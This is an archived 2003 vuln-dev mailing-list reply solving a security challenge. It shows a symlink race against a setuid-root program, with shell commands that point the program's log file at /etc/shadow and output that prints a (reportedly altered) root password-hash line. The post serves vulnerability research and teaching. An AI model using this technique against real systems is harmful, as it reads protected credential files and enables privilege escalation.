Re: [Vuln-dev Challenge] Challenge #2
From: Thomas Cannon (tcannon_at_noops.org)
Date: 05/24/03
- Previous message: Joel Eriksson: "Re: Frame Pointer Overwriting"
- In reply to: Dave McKinney: "[Vuln-dev Challenge] Challenge #2"
- Next in thread: Joel Eriksson: "Re: [Vuln-dev Challenge] Challenge #2 (SPOILER)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Fri, 23 May 2003 16:48:08 -0700 To: vuln-dev@securityfocus.com
>
> /* read log */
> if ( (f1 = fopen("db.log", "r")) == NULL)
> return 1;
> if (fgets(bfp, BFSIZE, f1) == NULL)
> return 1;
>
...and if db.log is perhaps a symlink to /etc/shadow?
I assumed the program would be chown'd to root, and set 4755. If this is an
invalid assumption, well, no point in reading any further.
I compiled the program, stopped it after it writing the input log, made a
symlink, and resumed running the program, with lovely results:
[tcannon@needle]$ rm db.log
[tcannon@needle]$ ln -s /etc/shadow db.log
[tcannon@needle]$ fg
./a.out a a
root:$1$TlFzTwuXXX.yj55Gy2RVfUd8dSDAE/:11955:0:99999:7:::
I like race conditions. No point in wasting your CPU -- that shadowed
password did get modified before I sent it to the list :-)
Cheers,
--tcannon
PS: Nice strcpy
- Previous message: Joel Eriksson: "Re: Frame Pointer Overwriting"
- In reply to: Dave McKinney: "[Vuln-dev Challenge] Challenge #2"
- Next in thread: Joel Eriksson: "Re: [Vuln-dev Challenge] Challenge #2 (SPOILER)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
